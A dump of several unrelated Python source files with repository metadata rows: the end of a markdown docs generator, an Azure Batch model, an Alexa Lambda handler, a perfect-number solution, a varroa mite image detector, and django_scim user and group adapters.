                module_md = generator.module2md(mod)
                if stdout_mode:
                    print(module_md)
                else:
                    to_md_file(
                        module_md,
                        module_name,
                        out_path=output_path,
                        watermark=watermark,
                    )
            else:
                raise Exception(f"Failed to generate markdown for {path}")
        else:
            # Path seems to be an import
            obj = locate(path)
            if obj is not None:
                # TODO: function to get path to file whatever the object is
                # if validate:
                #     subprocess.call(
                #         f"pydocstyle --convention=google {obj.__file__}", shell=True
                #     )
                if not stdout_mode:
                    print(f"Generating docs for python import: {path}")
                if hasattr(obj, "__path__"):
                    # Object is a package
                    for loader, module_name, _ in pkgutil.walk_packages(
                        path=obj.__path__,  # type: ignore
                        prefix=obj.__name__ + ".",  # type: ignore
                    ):
                        if _is_module_ignored(module_name, ignored_modules):
                            # Add module to ignore list, so submodule will also be ignored
                            ignored_modules.append(module_name)
                            continue
                        try:
                            mod = loader.find_module(module_name).load_module(  # type: ignore
                                module_name
                            )
                            module_md = generator.module2md(mod)
                            if not module_md:
                                # Module MD is empty -> ignore module and all submodules
                                # Add module to ignore list, so submodule will also be ignored
                                ignored_modules.append(module_name)
                                continue
                            if stdout_mode:
                                print(module_md)
                            else:
                                to_md_file(
                                    module_md,
                                    mod.__name__,
                                    out_path=output_path,
                                    watermark=watermark,
                                )
                        except Exception as ex:
                            print(
                                f"Failed to generate docs for module {module_name}: "
                                + repr(ex)
                            )
                else:
                    import_md = generator.import2md(obj)
                    if stdout_mode:
                        print(import_md)
                    else:
                        to_md_file(
                            import_md, path, out_path=output_path, watermark=watermark
                        )
            else:
                raise Exception(f"Failed to generate markdown for {path}.")
    if overview_file and not stdout_mode:
        if not overview_file.endswith(".md"):
            overview_file = overview_file + ".md"
        to_md_file(
            generator.overview2md(),
            overview_file,
            out_path=output_path,
            watermark=watermark,
        )
        # Write mkdocs pages file
        print("Writing mkdocs .pages file.")
        # TODO: generate navigation items to fix problem with naming
        with open(os.path.join(output_path, ".pages"), "w") as f:
            f.write(_MKDOCS_PAGES_TEMPLATE.format(overview_file=overview_file))
| 34.539234
| 131
| 0.548673
|
4a15b1d9cbe38ce73879dc7d328698a43c2690ce
| 2,275
|
py
|
Python
|
azure-batch/azure/batch/models/node_update_user_parameter.py
|
jmalobicky/azure-sdk-for-python
|
61234a3d83f8fb481d1dd2386e54e888864878fd
|
[
"MIT"
] | 1
|
2022-03-30T22:39:15.000Z
|
2022-03-30T22:39:15.000Z
|
azure-batch/azure/batch/models/node_update_user_parameter.py
|
jmalobicky/azure-sdk-for-python
|
61234a3d83f8fb481d1dd2386e54e888864878fd
|
[
"MIT"
] | 54
|
2016-03-25T17:25:01.000Z
|
2018-10-22T17:27:54.000Z
|
azure-batch/azure/batch/models/node_update_user_parameter.py
|
jmalobicky/azure-sdk-for-python
|
61234a3d83f8fb481d1dd2386e54e888864878fd
|
[
"MIT"
] | 2
|
2017-01-20T18:25:46.000Z
|
2017-05-12T21:31:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NodeUpdateUserParameter(Model):
    """The set of changes to be made to a user account on a node.

    :param password: The password of the account. The password is required for
     Windows nodes (those created with 'cloudServiceConfiguration', or created
     with 'virtualMachineConfiguration' using a Windows image reference). For
     Linux compute nodes, the password can optionally be specified along with
     the sshPublicKey property. If omitted, any existing password is removed.
    :type password: str
    :param expiry_time: The time at which the account should expire. If
     omitted, the default is 1 day from the current time. For Linux compute
     nodes, the expiryTime has a precision up to a day.
    :type expiry_time: datetime
    :param ssh_public_key: The SSH public key that can be used for remote
     login to the compute node. The public key should be compatible with
     OpenSSH encoding and should be base 64 encoded. This property can be
     specified only for Linux nodes. If this is specified for a Windows node,
     then the Batch service rejects the request; if you are calling the REST
     API directly, the HTTP status code is 400 (Bad Request). If omitted, any
     existing SSH public key is removed.
    :type ssh_public_key: str
    """

    # Maps Python attribute names to their wire-format (camelCase) keys and
    # msrest serialization types. NOTE: auto-generated by AutoRest — do not
    # hand-edit the mapping; regenerate instead.
    _attribute_map = {
        'password': {'key': 'password', 'type': 'str'},
        'expiry_time': {'key': 'expiryTime', 'type': 'iso-8601'},
        'ssh_public_key': {'key': 'sshPublicKey', 'type': 'str'},
    }

    def __init__(self, password=None, expiry_time=None, ssh_public_key=None):
        # All parameters are optional; `None` means "remove existing value"
        # per the class docstring above.
        super(NodeUpdateUserParameter, self).__init__()
        self.password = password
        self.expiry_time = expiry_time
        self.ssh_public_key = ssh_public_key
| 46.428571
| 78
| 0.67033
|
4a15b26563567dd3a11bc6c085483d82e455658a
| 1,306
|
py
|
Python
|
python/alexa_skill/lambda_function.py
|
calestar/experiments
|
6bebf93706334d601694ba51bf4011f788757ff8
|
[
"MIT"
] | 1
|
2021-11-03T02:23:13.000Z
|
2021-11-03T02:23:13.000Z
|
python/alexa_skill/lambda_function.py
|
calestar/experiments
|
6bebf93706334d601694ba51bf4011f788757ff8
|
[
"MIT"
] | 4
|
2021-08-31T22:13:34.000Z
|
2022-02-14T03:36:40.000Z
|
python/alexa_skill/lambda_function.py
|
calestar/experiments
|
6bebf93706334d601694ba51bf4011f788757ff8
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2020, 2021 Jean-Sebastien Gelinas, see LICENSE at the root of the repository
import json
def send_response(success, result):
    """Build, log, and return an Alexa-formatted response envelope.

    `result` is spoken as plain text; on success a simple card echoing the
    text is attached. The full response is printed as JSON for CloudWatch.
    """
    body = {
        'outputSpeech': {
            'type': 'PlainText',
            'text': result,
            'playBehavior': 'REPLACE_ENQUEUED',
        },
    }
    if success:
        body['card'] = {
            'type': 'Simple',
            'title': 'Success',
            'content': result,
        }
    response = {
        'version': '1.0',
        'sessionAttributes': {},
        'shouldEndSession': True,
        'response': body,
    }
    print('Response ***************')
    print(json.dumps(response))
    return response
def lambda_handler(request, context):
    """AWS Lambda entry point for the Alexa skill.

    Logs the incoming request/context, validates the payload shape, and
    answers with a confirmation that names the value of the last slot in
    the intent.

    Args:
        request: Alexa request payload (dict).
        context: Lambda context object; may be None in local tests.

    Returns:
        dict: Alexa response envelope produced by `send_response`.
    """
    print('Request ***************')
    print(json.dumps(request))
    if context is not None:
        print('Context ***************')
        print(context)
    if 'request' not in request:
        return send_response(False, 'Bad configuration')
    intent = request['request']['intent']['name']
    print(f"Intent: '{intent}'")
    value = None
    for name, slot in request['request']['intent']['slots'].items():
        value = slot['slotValue']['value']
        print(f"Slot '{name}': '{value}'")
    if value is None:
        # BUG FIX: previously `value` was referenced after the loop without
        # initialization, raising NameError whenever the intent had no slots.
        return send_response(False, 'Bad configuration')
    return send_response(True, f"Alright, I'll run {value}")
| 25.607843
| 92
| 0.529096
|
4a15b2ddeac0bd5a6e932fea52897d55111fbba6
| 797
|
py
|
Python
|
507.perfect-number.py
|
elfgzp/leetCode
|
964c6574d310a9a6c486bf638487fd2f72b83b3f
|
[
"MIT"
] | 3
|
2019-04-12T06:22:56.000Z
|
2019-05-04T04:25:01.000Z
|
507.perfect-number.py
|
elfgzp/Leetcode
|
964c6574d310a9a6c486bf638487fd2f72b83b3f
|
[
"MIT"
] | null | null | null |
507.perfect-number.py
|
elfgzp/Leetcode
|
964c6574d310a9a6c486bf638487fd2f72b83b3f
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode.cn id=507 lang=python3
#
# [507] 完美数
#
# https://leetcode-cn.com/problems/perfect-number/description/
#
# algorithms
# Easy (32.39%)
# Total Accepted: 3.4K
# Total Submissions: 10.4K
# Testcase Example: '28'
#
# 对于一个 正整数,如果它和除了它自身以外的所有正因子之和相等,我们称它为“完美数”。
#
# 给定一个 正整数 n, 如果他是完美数,返回 True,否则返回 False
#
#
#
# 示例:
#
#
# 输入: 28
# 输出: True
# 解释: 28 = 1 + 2 + 4 + 7 + 14
#
#
#
#
# 注意:
#
# 输入的数字 n 不会超过 100,000,000. (1e8)
#
#
class Solution(object):
    """LeetCode 507: decide whether a number is a perfect number."""

    def checkPerfectNumber(self, num):
        """Return True if `num` equals the sum of its proper positive divisors.

        Divisors are collected in pairs (i, num // i) up to sqrt(num), so the
        check runs in O(sqrt(num)).

        Fixes over the original version:
        - uses integer division (`//`) so the running sum stays an int
          instead of silently becoming a float via `num / i`;
        - does not double-count the square root when `num` is a perfect
          square;
        - avoids shadowing the builtin `sum`.

        :type num: int
        :rtype: bool
        """
        if num <= 1:
            # 1 has no proper divisors; non-positive inputs are never perfect.
            return False
        divisor_sum = 1  # 1 divides every num > 1
        for i in range(2, int(num ** 0.5) + 1):
            if num % i == 0:
                divisor_sum += i
                partner = num // i
                if partner != i:  # don't count a square root twice
                    divisor_sum += partner
        return divisor_sum == num
| 15.037736
| 62
| 0.51192
|
4a15b359ff7103a32d42ef15000756deba6e93ca
| 4,489
|
py
|
Python
|
zdo2021/main.py
|
JiriVales/zdo2021-vales
|
8cf22097d926b42814b4d366dfe49f1de70093a7
|
[
"MIT"
] | 1
|
2021-05-26T14:58:58.000Z
|
2021-05-26T14:58:58.000Z
|
zdo2021/main.py
|
JiriVales/zdo2021-vales
|
8cf22097d926b42814b4d366dfe49f1de70093a7
|
[
"MIT"
] | null | null | null |
zdo2021/main.py
|
JiriVales/zdo2021-vales
|
8cf22097d926b42814b4d366dfe49f1de70093a7
|
[
"MIT"
] | null | null | null |
import numpy as np
import skimage
from skimage import data
from skimage.morphology import label
from skimage.color import rgb2gray
from skimage import data
from skimage.filters import gaussian
from skimage.segmentation import active_contour
import skimage.segmentation
import scipy
import numpy as np
import scipy
from scipy import ndimage
class VarroaDetector():
    """Detects varroa destructor mites in bee-hive images by thresholding
    dark regions and filtering connected components by size and elliptical
    shape criteria."""

    def __init__(self):
        pass

    def predict(self, data):
        """
        :param data: np.ndarray with shape [pocet_obrazku, vyska, sirka, barevne_kanaly]
        :return: shape [pocet_obrazku, vyska, sirka], 0 - nic, 1 - varroa destructor
        """
        pocetobrazku = data.shape[0]  # number of images
        vyska = data.shape[1]  # image height (not used below)
        sirka = data.shape[2]  # image width (not used below)
        kanaly = data.shape[3]  # colour channels (not used below)
        # Parameters derived from a calibration set (20 mites):
        # Threshold (mites are markedly darker than the rest of the image)
        prah = 0.2
        # Size
        # accepted component area range for a mite:
        areamin = 100
        areamax = 200
        # Elliptical-shape criteria:
        # max relative difference between convex hull area and area:
        rkonvexmax = 0.1
        # non-compactness (perimeter^2 / area) range:
        maxnekompakt = 21
        minnekompakt = 13
        # major/minor axis ratio range:
        maxpomer = 1.6
        minpomer = 1.2
        result = []
        for i in range(pocetobrazku):
            # take one image:
            aktualniobrazek = data[i]
            # convert to grayscale:
            img = skimage.color.rgb2gray(aktualniobrazek)
            # threshold (keep dark pixels):
            imthr = img < prah
            # fill holes - caused by the mites' glossy surface:
            imthr = ndimage.binary_fill_holes(imthr)
            # label (separate the individual connected components)
            imlabel = label(imthr, background=0)
            # number of components
            #pocetvstupnichprvku = np.max(imlabel)
            #print(pocetvstupnichprvku)
            # compute region characteristics:
            props = skimage.measure.regionprops(imlabel)
            pocetdetekovanych = 0  # number of accepted detections
            varoa = 0  # mite detected?  NOTE(review): never read; `varroa` is assigned below — looks like a typo.
            spatnedetekovane = []  # labels of rejected components
            # go through all components:
            # NOTE(review): this loop variable shadows the outer image index `i`;
            # harmless here because `i` is not used again after the inner loop.
            for i in range(len(props)):
                convexarea = props[i].convex_area  # convex hull area
                area = props[i].area  # component area
                rozdilkonvexarea = (convexarea - area)/((convexarea+area)/2)  # relative convex-hull/area difference
                perimeter = props[i].perimeter  # perimeter
                nekompaktnost = (perimeter*perimeter)/area  # non-compactness measure
                major = props[i].major_axis_length  # major ellipse axis
                minor = props[i].minor_axis_length  # minor ellipse axis
                if minor == 0:  # avoid division by zero
                    minor = 0.0000001
                pomeros = major/minor  # axis ratio
                if area < areamax and area > areamin:  # size matches a mite
                    if rozdilkonvexarea < rkonvexmax:  # further elliptical-shape criteria
                        if nekompaktnost < maxnekompakt and nekompaktnost > minnekompakt:
                            if pomeros < maxpomer and pomeros > minpomer:
                                pocetdetekovanych += 1
                                ci = props[i].image  # NOTE(review): assigned but never used
                            else:
                                spatnedetekovane.append(props[i].label)
                        else:
                            spatnedetekovane.append(props[i].label)
                    else:
                        spatnedetekovane.append(props[i].label)
                else:
                    spatnedetekovane.append(props[i].label)
            #print(pocetdetekovanych)
            if pocetdetekovanych > 0:
                varroa = 1  # NOTE(review): set but never used (see `varoa` above)
            # erase the rejected components
            imlabel[np.isin(imlabel, spatnedetekovane)] = 0
            # resulting binary image (True only where an accepted label remains)
            vyslednyobr = imthr < imlabel
            # image done, append it to the results
            result.append(vyslednyobr)
        # all images done, stack into the output array
        navratovahodnota = np.array(result)
        return navratovahodnota
| 33.5
| 119
| 0.510581
|
4a15b39bc359ee70849b5c370afde703041f2ac2
| 21,544
|
py
|
Python
|
src/django_scim/adapters.py
|
15five/django_scim
|
d833026aaefaeed23e5a4a765c9d1ca699d94e01
|
[
"MIT"
] | 39
|
2017-02-24T23:33:13.000Z
|
2022-03-31T23:31:20.000Z
|
src/django_scim/adapters.py
|
15five/django_scim
|
d833026aaefaeed23e5a4a765c9d1ca699d94e01
|
[
"MIT"
] | 46
|
2017-09-22T20:57:41.000Z
|
2022-03-03T01:17:05.000Z
|
src/django_scim/adapters.py
|
15five/django_scim
|
d833026aaefaeed23e5a4a765c9d1ca699d94e01
|
[
"MIT"
] | 25
|
2017-01-12T00:44:36.000Z
|
2021-12-03T14:48:24.000Z
|
"""
Adapters are used to convert the data model described by the SCIM 2.0
specification to a data model that fits the data provided by the application
implementing a SCIM api.
For example, in a Django app, there are User and Group models that do
not have the same attributes/fields that are defined by the SCIM 2.0
specification. The Django User model has both ``first_name`` and ``last_name``
attributes but the SCIM specification requires this same data be sent under
the names ``givenName`` and ``familyName`` respectively.
An adapter is instantiated with a model instance. Eg::
user = get_user_model().objects.get(id=1)
scim_user = SCIMUser(user)
...
"""
from typing import Optional, Union
from urllib.parse import urljoin
from django import core
from django.contrib.auth import get_user_model
from django.urls import reverse
from scim2_filter_parser.attr_paths import AttrPath
from . import constants, exceptions
from .utils import (
get_base_scim_location_getter,
get_group_adapter,
get_group_filter_parser,
get_user_adapter,
get_user_filter_parser,
)
class SCIMMixin(object):
    """
    Base adapter mixin shared by the user and group adapters.

    Provides identity/location helpers, (de)serialization entry points and
    the PATCH-operation dispatch machinery. Concrete adapters (SCIMUser,
    SCIMGroup) supply ``url_name``, ``resource_type`` and ``ATTR_MAP``.
    """

    # Map of parsed SCIM attribute paths to model attribute names.
    # Populated by concrete subclasses.
    ATTR_MAP = {}

    # Name of the model field that stores the SCIM id.
    id_field = 'scim_id'  # Modifiable by overriding classes

    def __init__(self, obj, request=None):
        # Wrap a model instance; the request (if given) is used to build
        # absolute resource locations.
        self.obj = obj
        self._request = request

    @property
    def request(self):
        # The request is required for building absolute SCIM locations;
        # fail loudly if the adapter was created without one.
        if self._request:
            return self._request

        raise RuntimeError('Adapter is not associated with a request object. '
                           'Set object.request to avoid this error.')

    @request.setter
    def request(self, value):
        self._request = value

    @property
    def id(self):
        """Return the SCIM id of the wrapped object as a string."""
        return str(getattr(self.obj, self.id_field))

    @property
    def path(self):
        """Return the URL path of this resource (e.g. ``/scim/v2/Users/1``)."""
        return reverse(self.url_name, kwargs={'uuid': self.id})

    @property
    def location(self):
        """Return the absolute SCIM location URL of this resource."""
        return urljoin(get_base_scim_location_getter()(self.request), self.path)

    def to_dict(self):
        """
        Return a ``dict`` conforming to the object's SCIM Schema,
        ready for conversion to a JSON object.
        """
        d = {
            'id': self.id,
            'externalId': self.obj.scim_external_id,
        }

        return d

    def validate_dict(self, d):
        """
        Validate dict from SCIM call.

        Currently this method only validates:
        - the most common attributes
        - attributes against their expected types
        """
        for key, value in d.items():
            # Only 'active' has a declared expected type; other keys pass
            # through unvalidated.
            expected_type = {
                'active': bool,
            }.get(key)
            if expected_type and not isinstance(value, expected_type):
                raise exceptions.BadRequestError(
                    f'''"{key}" should be of type "{expected_type.__name__}". '''
                    f'''Got type "{type(value).__name__}"'''
                )

    def from_dict(self, d):
        """
        Consume a ``dict`` conforming to the object's SCIM Schema, updating the
        internal object with data from the ``dict``.

        This method is overridden and called by subclass adapters. Please make
        changes there.
        """
        scim_external_id = d.get('externalId')
        self.obj.scim_external_id = scim_external_id or ''

    def save(self):
        # Persist the wrapped model instance.
        self.obj.save()

    def delete(self):
        # Delete via a queryset so model-level delete side effects (signals
        # aside) are bypassed consistently.
        self.obj.__class__.objects.filter(id=self.id).delete()

    def handle_operations(self, operations):
        """
        The SCIM specification allows for making changes to specific attributes
        of a model. These changes are sent in PATCH requests and are batched into
        operations to be performed on a object. Operations can have an op code
        of 'add', 'remove', or 'replace'. This method iterates through all of the
        operations in ``operations`` and calls the appropriate handler (defined
        on the appropriate adapter) for each.

        Django-scim2 only provides a partial implementation of PATCH call
        handlers. The RFC (https://tools.ietf.org/html/rfc7644#section-3.5.2)
        specifies a number of requirements for a full PATCH implementation.
        This implementation does not meet all of those requirements. For
        example, these are some features that have been left out.

        Add Operations:
            - If the target location does not exist, the attribute and value
              are added.

        Remove Operations:
            - If the target location is a multi-valued attribute and a complex
              filter is specified comparing a "value", the values matched by the
              filter are removed. If no other values remain after removal of
              the selected values, the multi-valued attribute SHALL be
              considered unassigned.

        Replace Operations:
            - If the target location path specifies an attribute that does not
              exist, the service provider SHALL treat the operation as an "add".
        """
        for operation in operations:
            path = operation.get('path')
            value = operation.get('value')
            # One operation may expand into several (path, value) pairs when
            # no path was given and value is a dict of attributes.
            paths_and_values = self.parse_path_and_values(path, value)
            for path, value in paths_and_values:
                self.handle_path_and_value(path, value, operation)

    def handle_path_and_value(self,
                              path: AttrPath,
                              value: Union[str, list, dict],
                              operation: dict):
        """
        Validate then dispatch a single (path, value) pair to the op-specific
        handler (``handle_add`` / ``handle_remove`` / ``handle_replace``).
        """
        op_code = operation.get('op').lower()

        if op_code not in constants.VALID_PATCH_OPS:
            raise exceptions.BadRequestError(f'Unknown PATCH op "{op_code}"')

        # Per RFC 7644, a "remove" operation must name its target.
        if op_code == 'remove' and not path:
            msg = '"path" must be specified during "remove" PATCH calls'
            raise exceptions.BadRequestError(msg, scim_type='noTarget')

        # Optional per-op validator (validate_op_<op>) with a generic
        # fallback validator.
        validate_method = 'validate_op_' + op_code
        handler = getattr(self, validate_method, self._default_validate_op)
        if handler:
            handler(path, value, operation)

        # Required per-op handler: handle_<op>. AttributeError here means the
        # subclass does not implement the op.
        handle_method = 'handle_' + op_code
        handler = getattr(self, handle_method)
        handler(path, value, operation)

    def _default_validate_op(self,
                             path: Optional[AttrPath],
                             value: Union[str, list, dict],
                             operation: dict):
        """
        Validate the operation.

        Currently this method only validates:
        - the most common attributes
        - simple paths
        - attributes against their expected types
        """
        expected_type = None
        # Complex paths (filters/sub-attributes) are not type-checked here.
        if path and not path.is_complex:
            expected_type = {
                ('active', None, None): bool,
            }.get(path.first_path)
        if expected_type and not isinstance(value, expected_type):
            raise exceptions.BadRequestError(
                f'''"{operation['path']}" should be of type "{expected_type.__name__}". '''
                f'''Got type "{type(value).__name__}"'''
            )

    def parse_path_and_values(self,
                              path: Optional[str],
                              value: Union[str, list, dict]) -> list:
        """
        Return new paths and values given original paths and values.

        This method can be overridden to provide a more usable path and value
        within the associated handle methods.
        """
        paths_and_values = []

        # Convert all paths to AttrPath objects in preparation for use of
        # scim2-filter-parser. Complex paths pass through unchanged, as the
        # logic to handle them is not in place yet.
        if not path:
            if not isinstance(value, dict):
                raise ValueError('No path and operation value is a non-dict. Can not determine attribute.')

            # If there is no path and value is a dict, we assume that each
            # key in the dict is an attribute path. Let's convert attribute
            # paths to AttrPath objects to have a uniform API.
            for path, value in value.items():
                new_path = self.split_path(path)
                new_value = value
                paths_and_values.append((new_path, new_value))
        else:
            new_path = self.split_path(path)
            new_value = value
            paths_and_values.append((new_path, new_value))

        return paths_and_values

    def split_path(self, path: str) -> AttrPath:
        """
        Convert string path to an AttrPath object if possible.

        An AttrPath can be complex. Eg::

            - "addresses[type eq "work"]"
            - "members[value eq "123"].displayName"
            - "emails[type eq "work" and value co "@example.com"].value"

        It's up to the handlers to reject, ignore, handle requests with
        these types of paths. Handling them is above and beyond what
        the maintainer has time for.
        """
        # AttrPath requires a complete filter query. Thus we tack on
        # ' eq ""' to path to make a complete SCIM query.
        filter_ = path + ' eq ""'
        attr_path = AttrPath(filter_, self.ATTR_MAP)
        if not list(attr_path):
            msg = 'No attribute path found in request'
            raise exceptions.BadRequestError(msg)

        return attr_path

    def handle_add(self,
                   path: AttrPath,
                   value: Union[str, list, dict],
                   operation: dict):
        """
        Handle add operations per:
        https://tools.ietf.org/html/rfc7644#section-3.5.2.1
        """
        raise exceptions.NotImplementedError

    def handle_remove(self,
                      path: AttrPath,
                      value: Union[str, list, dict],
                      operation: dict):
        """
        Handle remove operations per:
        https://tools.ietf.org/html/rfc7644#section-3.5.2.2
        """
        raise exceptions.NotImplementedError

    def handle_replace(self,
                       path: AttrPath,
                       value: Union[str, list, dict],
                       operation: dict):
        """
        Handle replace operations per:
        https://tools.ietf.org/html/rfc7644#section-3.5.2.3
        """
        raise exceptions.NotImplementedError
class SCIMUser(SCIMMixin):
    """
    Adapter for adding SCIM functionality to a Django User object.

    This adapter can be overridden; see the ``USER_ADAPTER`` setting
    for details.
    """
    # Coupled to the URL conf; could be more decoupled.
    url_name = 'scim:users'
    resource_type = 'User'
    ATTR_MAP = get_user_filter_parser().attr_map

    @property
    def display_name(self):
        """
        Return the displayName of the user per the SCIM spec.

        Falls back to the username when either name part is missing.
        """
        if self.obj.first_name and self.obj.last_name:
            return u'{0.first_name} {0.last_name}'.format(self.obj)
        return self.obj.username

    @property
    def name_formatted(self):
        """Return the formatted full name (same as displayName)."""
        return self.display_name

    @property
    def emails(self):
        """
        Return the email of the user per the SCIM spec.
        """
        return [{'value': self.obj.email, 'primary': True}]

    @property
    def groups(self):
        """
        Return the groups of the user per the SCIM spec.
        """
        group_qs = self.obj.scim_groups.all()
        scim_groups = [get_group_adapter()(g, self.request) for g in group_qs]

        dicts = []
        for group in scim_groups:
            d = {
                'value': group.id,
                '$ref': group.location,
                'display': group.display_name,
            }
            dicts.append(d)

        return dicts

    @property
    def meta(self):
        """
        Return the meta object of the user per the SCIM spec.
        """
        d = {
            'resourceType': self.resource_type,
            'created': self.obj.date_joined.isoformat(),
            # NOTE(review): lastModified reuses date_joined; the user model
            # apparently has no modification timestamp to report.
            'lastModified': self.obj.date_joined.isoformat(),
            'location': self.location,
        }

        return d

    def to_dict(self):
        """
        Return a ``dict`` conforming to the SCIM User Schema,
        ready for conversion to a JSON object.
        """
        d = super().to_dict()
        d.update({
            'schemas': [constants.SchemaURI.USER],
            'userName': self.obj.username,
            'name': {
                'givenName': self.obj.first_name,
                'familyName': self.obj.last_name,
                'formatted': self.name_formatted,
            },
            'displayName': self.display_name,
            'emails': self.emails,
            'active': self.obj.is_active,
            'groups': self.groups,
            'meta': self.meta,
        })

        return d

    def from_dict(self, d):
        """
        Consume a ``dict`` conforming to the SCIM User Schema, updating the
        internal user object with data from the ``dict``.

        Please note, the user object is not saved within this method. To
        persist the changes made by this method, please call ``.save()`` on the
        adapter. Eg::

            scim_user.from_dict(d)
            scim_user.save()
        """
        super().from_dict(d)

        username = d.get('userName')
        self.obj.username = username or ''
        # Keep the SCIM-facing username field in sync with the model one.
        self.obj.scim_username = self.obj.username

        first_name = d.get('name', {}).get('givenName')
        self.obj.first_name = first_name or ''

        last_name = d.get('name', {}).get('familyName')
        self.obj.last_name = last_name or ''

        emails = d.get('emails', [])
        self.parse_emails(emails)

        # Passwords arrive in cleartext per the SCIM spec; hash via Django.
        cleartext_password = d.get('password')
        if cleartext_password:
            self.obj.set_password(cleartext_password)

        active = d.get('active')
        if active is not None:
            self.obj.is_active = active

    @classmethod
    def resource_type_dict(cls, request=None):
        """
        Return a ``dict`` containing ResourceType metadata for the user object.
        """
        id_ = cls.resource_type
        path = reverse('scim:resource-types', kwargs={'uuid': id_})
        location = urljoin(get_base_scim_location_getter()(request), path)
        return {
            'schemas': [constants.SchemaURI.RESOURCE_TYPE],
            'id': id_,
            'name': 'User',
            'endpoint': reverse('scim:users'),
            'description': 'User Account',
            'schema': constants.SchemaURI.USER,
            'meta': {
                'location': location,
                'resourceType': 'ResourceType'
            }
        }

    def parse_emails(self, value: Optional[list]):
        """
        Extract a single email address from a SCIM ``emails`` value and store
        it on the user, preferring entries flagged ``primary``.

        ``value`` may be a list of email dicts (per spec) or a single dict
        (OneLogin deviates from the spec). Raises BadRequestError when no
        valid address can be extracted.
        """
        if value:
            email = None
            if isinstance(value, list):
                # Prefer primary addresses; ties broken by sorting on the
                # address itself for determinism.
                primary_emails = sorted(
                    (e for e in value if e.get('primary')),
                    key=lambda d: d.get('value')
                )
                secondary_emails = sorted(
                    (e for e in value if not e.get('primary')),
                    key=lambda d: d.get('value')
                )

                emails = primary_emails + secondary_emails
                if emails:
                    email = emails[0].get('value')
                else:
                    raise exceptions.BadRequestError('Invalid email value')
            elif isinstance(value, dict):
                # if value is a dict, let's assume it contains the primary email.
                # OneLogin sends a dict despite the spec:
                #   https://tools.ietf.org/html/rfc7643#section-4.1.2
                #   https://tools.ietf.org/html/rfc7643#section-8.2
                email = (value.get('value') or '').strip()

            self.validate_email(email)

            self.obj.email = email

    @staticmethod
    def validate_email(email):
        """Raise BadRequestError unless ``email`` is a valid email address."""
        try:
            core.validators.EmailValidator()(email)
        except core.exceptions.ValidationError:
            raise exceptions.BadRequestError('Invalid email value')

    def handle_replace(self,
                       path: Optional[AttrPath],
                       value: Union[str, list, dict],
                       operation: dict):
        """
        Handle the replace operations.

        Saves the user after applying all attribute replacements. Raises
        NotImplementedError for attributes outside ``ATTR_MAP``/emails.
        """
        if not isinstance(value, dict):
            # A single-attribute replace arrives as (path, scalar value);
            # normalize it to the {path: value} mapping a dict payload uses
            # so both shapes share the loop below.
            # (BUGFIX: a second, unreachable isinstance check that followed
            # this normalization has been removed — after this branch,
            # ``value`` is always a dict.)
            value = {path: value}

        for attr_path, attr_value in value.items():
            if attr_path.first_path in self.ATTR_MAP:
                setattr(self.obj, self.ATTR_MAP[attr_path.first_path], attr_value)

            elif attr_path.first_path == ('emails', None, None):
                self.parse_emails(attr_value)

            else:
                raise exceptions.NotImplementedError('Not Implemented')

        self.save()
class SCIMGroup(SCIMMixin):
    """
    Adapter for adding SCIM functionality to a Django Group object.

    This adapter can be overridden; see the ``GROUP_ADAPTER``
    setting for details.
    """
    # Coupled to the URL conf; could be more decoupled.
    url_name = 'scim:groups'
    resource_type = 'Group'
    ATTR_MAP = get_group_filter_parser().attr_map

    @property
    def display_name(self):
        """
        Return the displayName of the group per the SCIM spec.
        """
        return self.obj.name

    @property
    def members(self):
        """
        Return a list of user dicts (ready for serialization) for the members
        of the group.

        :rtype: list
        """
        adapters = (
            get_user_adapter()(user, self.request)
            for user in self.obj.user_set.all()
        )
        return [
            {
                'value': adapter.id,
                '$ref': adapter.location,
                'display': adapter.display_name,
            }
            for adapter in adapters
        ]

    @property
    def meta(self):
        """
        Return the meta object of the group per the SCIM spec.
        """
        return {
            'resourceType': self.resource_type,
            'location': self.location,
        }

    def to_dict(self):
        """
        Return a ``dict`` conforming to the SCIM Group Schema,
        ready for conversion to a JSON object.
        """
        serialized = super().to_dict()
        serialized.update({
            'schemas': [constants.SchemaURI.GROUP],
            'displayName': self.display_name,
            'members': self.members,
            'meta': self.meta,
        })
        return serialized

    def from_dict(self, d):
        """
        Consume a ``dict`` conforming to the SCIM Group Schema, updating the
        internal group object with data from the ``dict``.

        Please note, the group object is not saved within this method. To
        persist the changes made by this method, please call ``.save()`` on the
        adapter. Eg::

            scim_group.from_dict(d)
            scim_group.save()
        """
        super().from_dict(d)
        self.obj.name = d.get('displayName') or ''

    @classmethod
    def resource_type_dict(cls, request=None):
        """
        Return a ``dict`` containing ResourceType metadata for the group object.
        """
        type_id = cls.resource_type
        type_path = reverse('scim:resource-types', kwargs={'uuid': type_id})
        type_location = urljoin(
            get_base_scim_location_getter()(request), type_path)
        return {
            'schemas': [constants.SchemaURI.RESOURCE_TYPE],
            'id': type_id,
            'name': 'Group',
            'endpoint': reverse('scim:groups'),
            'description': 'Group',
            'schema': constants.SchemaURI.GROUP,
            'meta': {
                'location': type_location,
                'resourceType': 'ResourceType'
            }
        }

    def _member_users(self, value, missing_msg):
        """
        Resolve SCIM member references in ``value`` to User objects; raise
        BadRequestError with ``missing_msg`` if any referenced id is absent.
        """
        member_ids = [int(member.get('value')) for member in (value or [])]
        users = get_user_model().objects.filter(id__in=member_ids)
        if users.count() != len(member_ids):
            raise exceptions.BadRequestError(missing_msg)
        return users

    def handle_add(self, path, value, operation):
        """
        Handle add operations.
        """
        if path.first_path != ('members', None, None):
            raise exceptions.NotImplementedError
        users = self._member_users(
            value, 'Can not add a non-existent user to group')
        for user in users:
            self.obj.user_set.add(user)

    def handle_remove(self, path, value, operation):
        """
        Handle remove operations.
        """
        if path.first_path != ('members', None, None):
            raise exceptions.NotImplementedError
        users = self._member_users(
            value, 'Can not remove a non-existent user from group')
        for user in users:
            self.obj.user_set.remove(user)

    def handle_replace(self, path, value, operation):
        """
        Handle the replace operations.
        """
        if path.first_path != ('name', None, None):
            raise exceptions.NotImplementedError
        self.obj.name = value[0].get('value')
        self.save()
| 32.841463
| 107
| 0.569393
|
4a15b52b0d4ac478c42a07f7862d9b09160dfbe8
| 4,828
|
py
|
Python
|
tests/test_teleportation.py
|
